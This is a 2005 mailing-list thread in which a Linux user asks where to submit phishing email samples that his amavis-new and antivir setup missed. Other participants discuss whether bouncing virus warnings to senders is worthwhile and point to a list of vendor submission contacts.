-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I got some emails that I forwarded to somebody else, and his mail server antivirus said they contained html viruses: HTML.Phishing.GB-gen HTML.Phishing.DB-1 Now, my amavis-new with antivir from H+BEDV Datentechnik GmbH (incuded in the SuSE DVD), updated a moment ago (VDF version: 6.32.3.5 created 23 Sep 2005) did not detect them. Well, actually, running "antivir" on my local mbox it does say there is a virus there (there should be two): /home/cer/mbox Date: 24.09.2005 Time: 21:24:09 Size: 1471684 ALERT: [PHISH/PostBkfraud.I virus] /home/cer/mbox <<< Contains code of the PHISH/PostBkfraud.I virus Also, it should detect the virus in the files where I saved them, but it doesn't. Now, I'm not worried about those viruses damaging my system (I use Pine as MUA), but about the amavis+antivir setup not warning me about them when I try to forward them as emails (I have a friend that is interested in those emails). Now, my question: To whom do I email a sample of those viruses so that they update the "antivir" database? An email address, please. I looked at their webpage, but was unable to find it. - -- Cheers, Carlos Robinson -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.0 (GNU/Linux) Comment: Made with pgp4pine 1.76 iD8DBQFDNauctTMYHG2NR9URAqxiAJ4yFN26ZTn097JOt9qFKQEkVmj5pwCfVQUK nXTcWGrVkFd3yf93bJqCi+E= =9FoR -----END PGP SIGNATURE-----
On Saturday 24 September 2005 21:40, Carlos E. R. wrote:
I got some emails that I forwarded to somebody else, and his mail server antivirus said they contained html viruses:
HTML.Phishing.GB-gen HTML.Phishing.DB-1
a 5 second google didn't turn up anything interesting, but "phishing" doesn't normally mean virus, usually that refers to things like "Hi, I work for Deutsche Bank, please give me your password to our online banking service"
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The Saturday 2005-09-24 at 21:48 +0200, Anders Johansson wrote:
HTML.Phishing.GB-gen HTML.Phishing.DB-1
a 5 second google didn't turn up anything interesting, but "phishing" doesn't normally mean virus, usually that refers to things like "Hi, I work for Deutsche Bank, please give me your password to our online banking service"
I know; it is surprising that people fall in the trap. But some of these emails contain javascript code, they rate as viruses as well. I didn't think it is the job of an antivirus program to say "Hey, you got a virus in your machine! You sent a virus to me!" if it is not a virus, don't you think? - -- Cheers, Carlos Robinson -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.0 (GNU/Linux) Comment: Made with pgp4pine 1.76 iD8DBQFDNeuNtTMYHG2NR9URArXSAJ43zkS+vax6hmUj+WGU2MSmdCEc8gCfRja1 Ed9QhXniig/FA2k/DyXAhkI= =j3B1 -----END PGP SIGNATURE-----
On Sunday 25 September 2005 02:12, Carlos E. R. wrote:
I didn't think it is the job of an antivirus program to say "Hey, you got a virus in your machine! You sent a virus to me!" if it is not a virus, don't you think?
I don't think it's the job of the AV program to say anything at all to the sender. Why bother bouncing the virus? In most cases the sender address will be forged anyway. It just causes needless (not to say useless) network traffic Thunderbird has started flagging suspected phishing attempts. I guess it's considered added value in these types of programs. But bouncing phishing attempts is probably worse than useless, as it tells these people that there is a valid mailbox there
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The Sunday 2005-09-25 at 02:26 +0200, Anders Johansson wrote:
I don't think it's the job of the AV program to say anything at all to the sender. Why bother bouncing the virus? In most cases the sender address will be forged anyway. It just causes needless (not to say useless) network traffic
In this case, it helped, because I noticed, and resent encapsulating in an encrypted zip archive. Amavis-new doesn't bounce if the virus is one known for forging the from address, it is clever.
Thunderbird has started flagging suspected phishing attempts. I guess it's considered added value in these types of programs.
Yes...
But bouncing phishing attempts is probably worse than useless, as it tells these people that there is a valid mailbox there
Well, in this case the bounce originates from the mail host machine, which is in a different domain altogether than the destination, which must be a virtual address then. It needs a human reading the email to check that. And in any case, the destination address is publicly known, so no damage can be done. - -- Cheers, Carlos Robinson -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.0 (GNU/Linux) Comment: Made with pgp4pine 1.76 iD8DBQFDNopatTMYHG2NR9URAjtBAKCL8FtlSs1bAF+K3iTGomDKsnCwDACdElJA k+WJYWpQf68UbhG9S+ePW3Y= =53ZK -----END PGP SIGNATURE-----
Carlos E. R. said:
Now, my question:
To whom do I email a sample of those viruses so that they update the "antivir" database? An email address, please. I looked at their webpage, but was unable to find it.
Here's a good reference list: http://marc.theaimsgroup.com/?l=full-disclosure&m=109520967903662&w=2
participants (3)
-
Anders Johansson -
Carlos E. R. -
Michel Messerschmidt